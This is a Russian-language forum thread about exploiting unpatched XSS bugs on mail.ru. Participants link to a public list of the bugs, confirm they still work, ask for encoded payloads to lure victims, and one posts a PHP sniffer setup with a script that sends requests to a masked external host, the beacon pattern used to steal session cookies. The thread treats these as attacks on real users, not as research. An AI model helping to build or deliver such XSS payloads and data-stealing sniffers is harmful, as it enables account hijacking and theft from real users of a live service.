XSS на mail.ru
 

Короче, это нашел не я. Уязвимости лежат в паблике уже долгое время. Обнаружил не я, а типуля, судя по сайту ему 16 лет. Короче респект и уважуха таким )) Надеюсь, если он выложил их в паблик, то ему их не жалко (засекаем время):
http://usatikov.com/bugs.php

Чет не работает нифига. Походу уже поправили давно..

Не надо, прекрасно работает

Ещё бы. Он ведь пишет, что сначала "стучит" админам, а потом публикует.

xss.netsec.ru чет отвалил...кто нить знает альтернативу...?=)

не вижу пользы в алертах, имхо, врятли кто будет ходить в кодированных сылках... лучше соц....

Нлять пацаны дайте кто нить в закодированном виде...я сам это делаю с трудом ...докуя времени уйдет. А так бага вполне рабочая думаю.

уже 8 часов прошло со времени создания поста, еще не закрыли )) Хотя выходные же ). Наверное еще и завтра работать будут )

Наверное нашел ту же самую багу, оповестил техподдержку и теперь бага, которая была найдена еще до него будет закрыта. :(

Создал сниффер на php хосте.
Набираю в строке браузера http://****/data.php?1.
В логах приходит "1". Все нормально.

Создаю html страничку к кодом:

<script type="text/javascript">
img=new Image();
img.src="http://****/data.php?1"
</script>

Загружаю ее в своем браузере. Ничего на сниффер не приходит. Почему?